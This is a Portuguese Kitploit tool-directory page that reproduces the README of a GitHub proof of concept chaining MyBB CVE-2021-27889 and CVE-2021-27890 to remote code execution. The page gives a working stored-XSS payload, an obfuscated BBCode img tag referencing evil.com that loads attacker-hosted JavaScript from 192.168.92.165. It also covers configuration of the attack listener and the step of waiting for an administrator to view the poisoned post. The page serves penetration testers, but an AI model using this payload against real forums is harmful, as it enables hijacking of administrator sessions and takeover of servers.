Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb associa CVE-2021-27890 & CVE-2021-27889 a RCE poc | Kitploit
Ferramentas/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Geração de PayloadsExploraçãoExploração de Aplicações Web
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb associa CVE-2021-27890 & CVE-2021-27889 a RCE poc

Ver Repositório
102há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Mybb-XSS_SQL_RCE-POC

Mybb associa CVE-2021-27890 & CVE-2021-27889 ao RCE poc

Antes de usar:

Há dois arquivos aqui: 1.js e attack_listen.py

Você deve modificar esses dois arquivos:

1.js:

modifique a url do fórum mybb e a url de ataque:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

modifique o host de ataque e a porta de ataque:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

Uso:

CVE-2021-27889 é xss. Você deve injetar o seguinte payload em "New Post Thread" ou "Reply" ou "Private Messages" antes de realizar o ataque. Nesta demonstração, enviei o payload para "New Post Thread"

note que o 192.168.92.165 é o ip do servidor malicioso. Você deve alterá-lo.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Agora nosso js malicioso 1.js foi injetado com sucesso. Então devemos esperar que um Administrador visualize esta Postagem com o cookie da página de admin logado.

Observe que o usuário Admin não precisa estar logado na página do fórum.


Enquanto esperamos, devemos executar o "attack_listen.py" em nossa máquina de ataque, para identificar se o usuário Admin foi atacado.

root@kitploit:~
python3 attack_listen.py

Quando o usuário Admin visualizar a postagem maliciosa, o js malicioso realizará o ataque:


Podemos receber as informações em nossa máquina de ataque:

Baixar ferramenta